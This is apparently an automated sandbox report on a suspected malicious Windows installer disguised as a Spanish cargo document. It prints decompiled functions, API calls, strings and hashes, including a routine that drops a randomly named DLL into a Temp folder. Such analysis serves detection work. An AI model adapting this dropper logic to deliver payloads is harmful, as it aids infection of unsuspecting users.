                        • lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
                        • wsprintfA.USER32 ref: 0040471E
                        • SetDlgItemTextA.USER32 ref: 00404731
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: ItemTextlstrlenwsprintf
                        • String ID: %u.%u%s%s
                        • API String ID: 3540041739-3551169577
                        • Opcode ID: 6c6975893237cdfa5224ded18cab2bae0030b0bcb524b99bf5bfa446dcdb2360
                        • Instruction ID: 062a34f2e1a42b9bac053d54189fda3392bb7b96bf994c182a5c545f77b0e815
                        • Opcode Fuzzy Hash: 6c6975893237cdfa5224ded18cab2bae0030b0bcb524b99bf5bfa446dcdb2360
                        • Instruction Fuzzy Hash: CD110673A041282BEB00656D9C41EAF32D8DB86334F290637FA25F71D1E979EC1246E9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00401BCA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                        Download Yara Rule
                        C-Code - Quality: 51%
                        			E00401BCA() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 8) = E00402A0C(3);
				 *(_t55 + 8) = E00402A0C(4);
				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402A29(0x33);
				}
				__eflags =  *(_t55 - 0x14) & 0x00000002;
				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
					 *(_t55 + 8) = E00402A29(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E00402A29();
					_t28 = E00402A29();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E00402A0C();
					_t37 = E00402A0C();
					_t48 =  *(_t55 - 0x14) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
						L10:
						 *(_t55 - 0xc) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
					_push( *(_t55 - 0xc));
					E00405B25();
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                        0x00401bd3
                        0x00401bdf
                        0x00401be2
                        0x00401beb
                        0x00401beb
                        0x00401bee
                        0x00401bf2
                        0x00401bfb
                        0x00401bfb
                        0x00401bfe
                        0x00401c02
                        0x00401c04
                        0x00401c51
                        0x00401c53
                        0x00401c5c
                        0x00401c64
                        0x00401c67
                        0x00401c67
                        0x00401c70
                        0x00000000
                        0x00401c06
                        0x00401c0d
                        0x00401c0f
                        0x00401c17
                        0x00401c1a
                        0x00401c42
                        0x00401c76
                        0x00401c76
                        0x00401c1c
                        0x00401c2a
                        0x00401c32
                        0x00401c35
                        0x00401c35
                        0x00401c1a
                        0x00401c79
                        0x00401c7c
                        0x00401c82
                        0x00402866
                        0x00402866
                        0x004028c1
                        0x004028cd

                        APIs
                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                        • SendMessageA.USER32 ref: 00401C42
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: MessageSend$Timeout
                        • String ID: !
                        • API String ID: 1777923405-2657877971
                        • Opcode ID: d44a61a2a2c95e3216d06c81e49a509776d28ac41f2de2fd4f53c7e5812b41e9
                        • Instruction ID: 4d3ef85e63b9541cbe972d5e7c3a425ff70263948fb1d71cee34ed50e591440d
                        • Opcode Fuzzy Hash: d44a61a2a2c95e3216d06c81e49a509776d28ac41f2de2fd4f53c7e5812b41e9
                        • Instruction Fuzzy Hash: B821A171A44149BEEF02AFF5C94AAEE7B75DF44704F10407EF501BA1D1DAB88A40DB29
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004038E3, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E004038E3(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405B3E(__ecx, "1033");
				while(1) {
					_t26 =  *0x42ec64; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x42ec30; // 0x6e1110
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x42ec60;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x42e400 = _t18[1];
					 *0x42ecc8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42e3fc = _t23;
						E00405B25(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x42a078, E00405BE9(_t13, _t24, _t26, "dah Setup", 0xfffffffe));
						_t11 =  *0x42ec4c; // 0x3
						_t27 =  *0x42ec48; // 0x6e12bc
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x6e12d4
								_t11 = E00405BE9(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

















                        0x004038e7
                        0x004038ec
                        0x004038f2
                        0x004038f7
                        0x004038f7
                        0x004038ff
                        0x00000000
                        0x00000000
                        0x00403901
                        0x00403907
                        0x0040390f
                        0x00403911
                        0x00403917
                        0x00403917
                        0x00403919
                        0x00403925
                        0x00000000
                        0x00000000
                        0x00403929
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040392b
                        0x00403930
                        0x00403939
                        0x0040393f
                        0x00403944
                        0x00403958
                        0x00403963
                        0x0040397b
                        0x00403981
                        0x00403986
                        0x0040398e
                        0x004039af
                        0x004039af
                        0x004039af
                        0x00403990
                        0x00403992
                        0x00403992
                        0x00403996
                        0x00403999
                        0x0040399d
                        0x0040399d
                        0x004039a2
                        0x004039a8
                        0x004039a8
                        0x00000000
                        0x00403992
                        0x00403946
                        0x0040394b
                        0x00403954
                        0x0040394d
                        0x0040394d
                        0x0040394d
                        0x0040394b

                        APIs
                        • SetWindowTextA.USER32(00000000,dah Setup), ref: 0040397B
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: TextWindow
                        • String ID: "C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe" $1033$dah Setup
                        • API String ID: 530164218-1258467875
                        • Opcode ID: 44086840014d5f932eec3ecda3fe01ed682aa00d856216dbdc4f037c80fefe2b
                        • Instruction ID: 62fcd584ab61880d0a0793d1f8a393d96878735a1f32199b1fca161b6814d522
                        • Opcode Fuzzy Hash: 44086840014d5f932eec3ecda3fe01ed682aa00d856216dbdc4f037c80fefe2b
                        • Instruction Fuzzy Hash: 7F1105B1B046119BC7349F57DC809737BACEB85715368813FE8016B3A0DA79AD03CB98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004056BA, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E004056BA(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                        0x004056bb
                        0x004056d2
                        0x004056da
                        0x004056da
                        0x004056e2

                        APIs
                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403117,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004056C0
                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403117,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004056C9
                        • lstrcatA.KERNEL32(?,00409010), ref: 004056DA
                        Strings
                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004056BA
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CharPrevlstrcatlstrlen
                        • String ID: C:\Users\user\AppData\Local\Temp\
                        • API String ID: 2659869361-823278215
                        • Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                        • Instruction ID: 80516fad0c4d4920465a9bb29442f27547f360336c83292ed6deef4f7ecf272a
                        • Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                        • Instruction Fuzzy Hash: 88D0A962A09A302AE20223198C05F9B7AA8CF02351B080862F140B6292C27C3C818BFE
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00401D38, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                        Download Yara Rule
                        C-Code - Quality: 67%
                        			E00401D38() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x40b044->lfHeight =  ~(MulDiv(E00402A0C(2), _t6, 0x48));
				 *0x40b054 = E00402A0C(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x18));
				 *0x40b05b = 1;
				 *0x40b058 = _t11 & 0x00000001;
				 *0x40b059 = _t11 & 0x00000002;
				 *0x40b05a = _t11 & 0x00000004;
				E00405BE9(_t18, _t24, _t26, 0x40b060,  *((intOrPtr*)(_t28 - 0x24)));
				_t14 = CreateFontIndirectA(0x40b044);
				_push(_t14);
				_push(_t26);
				E00405B25();
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                        0x00401d46
                        0x00401d5f
                        0x00401d69
                        0x00401d6e
                        0x00401d79
                        0x00401d80
                        0x00401d92
                        0x00401d98
                        0x00401d9d
                        0x00401da7
                        0x004024eb
                        0x00401561
                        0x00402866
                        0x004028c1
                        0x004028cd

                        APIs
                        • GetDC.USER32(?), ref: 00401D3F
                        • GetDeviceCaps.GDI32(00000000), ref: 00401D46
                        • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D55
                        • CreateFontIndirectA.GDI32(0040B044), ref: 00401DA7
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CapsCreateDeviceFontIndirect
                        • String ID:
                        • API String ID: 3272661963-0
                        • Opcode ID: 8ab92fdc2903857b72d1cffa18b3104b68d957a3c6a7ba5d3e2689a32af85142
                        • Instruction ID: d817c33c406d5a72f0d35d0353d877ca697365183e6ac762242a66cad999de2e
                        • Opcode Fuzzy Hash: 8ab92fdc2903857b72d1cffa18b3104b68d957a3c6a7ba5d3e2689a32af85142
                        • Instruction Fuzzy Hash: DFF06871A482C0AFE70167709F5AB9B3F64D712305F104476F251BA2E3C77D14448BAD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00402BF1, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00402BF1(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x420c48; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x42ec2c;
						if(_t2 >  *0x42ec2c) {
							_t3 = CreateDialogParamA( *0x42ec20, 0x6f, 0, E00402B6E, 0);
							 *0x420c48 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00405F93(0);
					}
				} else {
					_t6 =  *0x420c48; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x420c48 = 0;
					return _t6;
				}
			}






                        0x00402bf8
                        0x00402c12
                        0x00402c18
                        0x00402c22
                        0x00402c28
                        0x00402c2e
                        0x00402c3f
                        0x00402c48
                        0x00000000
                        0x00402c4d
                        0x00402c54
                        0x00402c1a
                        0x00402c21
                        0x00402c21
                        0x00402bfa
                        0x00402bfa
                        0x00402c01
                        0x00402c04
                        0x00402c04
                        0x00402c0a
                        0x00402c11
                        0x00402c11

                        APIs
                        • DestroyWindow.USER32(00000000,00000000,00402DD1,00000001), ref: 00402C04
                        • GetTickCount.KERNEL32 ref: 00402C22
                        • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
                        • ShowWindow.USER32(00000000,00000005), ref: 00402C4D
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                        • String ID:
                        • API String ID: 2102729457-0
                        • Opcode ID: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
                        • Instruction ID: af7afb5c67b035eb61978086e86d3b64d4827bf2199b448f7584534e2ab44da5
                        • Opcode Fuzzy Hash: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
                        • Instruction Fuzzy Hash: 46F0E270A0D260ABC3746F66FE8C98F7BA4F744B017400876F104B11E9CA7858C68B9D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00404E03, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00404E03(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x42a088 != _t22) {
							 *0x42a088 = _t22;
							E00405BC7(0x42a0a0, 0x42f000);
							E00405B25(0x42f000, _t22);
							E0040140B(6);
							E00405BC7(0x42f000, 0x42a0a0);
						}
						L11:
						return CallWindowProcA( *0x42a090, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E00404782(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403ECF(0x413);
				return 0;
			}




                        0x00404e0f
                        0x00404e34
                        0x00404e54
                        0x00404e57
                        0x00404e5a
                        0x00404e71
                        0x00404e77
                        0x00404e7e
                        0x00404e85
                        0x00404e8c
                        0x00404e91
                        0x00404e97
                        0x00000000
                        0x00404ea7
                        0x00404e41
                        0x00404e94
                        0x00404e94
                        0x00000000
                        0x00404e94
                        0x00404e4d
                        0x00404e4f
                        0x00000000
                        0x00404e4f
                        0x00404e15
                        0x00000000
                        0x00000000
                        0x00404e1c
                        0x00000000

                        APIs
                        • IsWindowVisible.USER32(?), ref: 00404E39
                        • CallWindowProcA.USER32 ref: 00404EA7
                          • Part of subcall function 00403ECF: SendMessageA.USER32 ref: 00403EE1
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Window$CallMessageProcSendVisible
                        • String ID:
                        • API String ID: 3748168415-3916222277
                        • Opcode ID: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
                        • Instruction ID: a1b1c3265e10147a864b820895246e20bcc7fdce94b5a9a997a836c51e1a414d
                        • Opcode Fuzzy Hash: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
                        • Instruction Fuzzy Hash: 4C113D71500218ABDB215F51DC44E9B3B69FB44759F00803AFA18691D1C77C5D619FAE
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004024F1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E004024F1(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x20)) == __ebx) {
					_t7 = lstrlenA(E00402A29(0x11));
				} else {
					E00402A0C(1);
					 *0x40a040 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405B3E(_t17 + 8, _t15), "C:\Users\alfons\AppData\Local\Temp\nsk2A27.tmp\sbolbwplhfo.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                        0x004024f1
                        0x004024f1
                        0x004024f4
                        0x0040250f
                        0x004024f6
                        0x004024f8
                        0x004024fd
                        0x00402504
                        0x00402516
                        0x0040268f
                        0x0040268f
                        0x0040251c
                        0x0040252e
                        0x004015a6
                        0x004015a8
                        0x00000000
                        0x004015ae
                        0x004015a8
                        0x004028c1
                        0x004028cd

                        APIs
                        • lstrlenA.KERNEL32(00000000,00000011), ref: 0040250F
                        • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsk2A27.tmp\sbolbwplhfo.dll,00000000,?,?,00000000,00000011), ref: 0040252E
                        Strings
                        • C:\Users\user\AppData\Local\Temp\nsk2A27.tmp\sbolbwplhfo.dll, xrefs: 004024FD, 00402522
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: FileWritelstrlen
                        • String ID: C:\Users\user\AppData\Local\Temp\nsk2A27.tmp\sbolbwplhfo.dll
                        • API String ID: 427699356-2168528594
                        • Opcode ID: 76b72eb1bb037845af2373cb3d3fbf761991c376917fb0c01088b7ebefde820f
                        • Instruction ID: 02596e95378ee295436ef63fdf7a12543175d591b2ab5856f5875b5858eb07cb
                        • Opcode Fuzzy Hash: 76b72eb1bb037845af2373cb3d3fbf761991c376917fb0c01088b7ebefde820f
                        • Instruction Fuzzy Hash: A7F082B2A04244BFD710EFA59E49AEF7668DB40348F20043BF142B51C2E6BC99419B6E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405427, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00405427(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42c0a8->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x42c0a8,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                        0x00405430
                        0x0040544c
                        0x00405454
                        0x00405459
                        0x00000000
                        0x0040545f
                        0x00405463

                        APIs
                        Strings
                        • Error launching installer, xrefs: 0040543A
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CloseCreateHandleProcess
                        • String ID: Error launching installer
                        • API String ID: 3712363035-66219284
                        • Opcode ID: 352801a7e77fb30640a675ef02418396bf0d6615a7888bd77d000c6466e39ab6
                        • Instruction ID: 2c90aa490b53110c60c3ebae751c11bf5c05897806c56d3989ec330efb9c4960
                        • Opcode Fuzzy Hash: 352801a7e77fb30640a675ef02418396bf0d6615a7888bd77d000c6466e39ab6
                        • Instruction Fuzzy Hash: 35E0ECB4A04209BFDB109FA4EC49AAF7BBCFB00305F408521AA14E2150E774D8148AA9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00403585, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00403585() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x42905c;
				_t3 = E0040356A(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x42905c =  *0x42905c & 0x00000000;
				return _t3;
			}







                        0x00403586
                        0x0040358e
                        0x00403595
                        0x00403598
                        0x00403598
                        0x0040359a
                        0x0040359f
                        0x004035a6
                        0x004035ac
                        0x004035b0
                        0x004035b1
                        0x004035b9

                        APIs
                        • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?,0040355D,00403366,00000020), ref: 0040359F
                        • GlobalFree.KERNEL32 ref: 004035A6
                        Strings
                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403597
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Free$GlobalLibrary
                        • String ID: C:\Users\user\AppData\Local\Temp\
                        • API String ID: 1100898210-823278215
                        • Opcode ID: ac7f27994bd3325b2d0095e79668b7c9fa9e3b8299eadab29ed3cfae008e212f
                        • Instruction ID: 66eb0e2672836502cdeb887367c424fec6a3009010210fcd00c586b28cfd98d1
                        • Opcode Fuzzy Hash: ac7f27994bd3325b2d0095e79668b7c9fa9e3b8299eadab29ed3cfae008e212f
                        • Instruction Fuzzy Hash: 45E0C233900130A7CB715F44EC0475A776C6F49B22F010067ED00772B0C3742D424BD8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405701, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00405701(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                        0x00405702
                        0x0040570c
                        0x0040570e
                        0x00405715
                        0x0040571d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040571d
                        0x0040571f
                        0x00405724

                        APIs
                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe,C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe,80000000,00000003), ref: 00405707
                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe,C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe,80000000,00000003), ref: 00405715
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
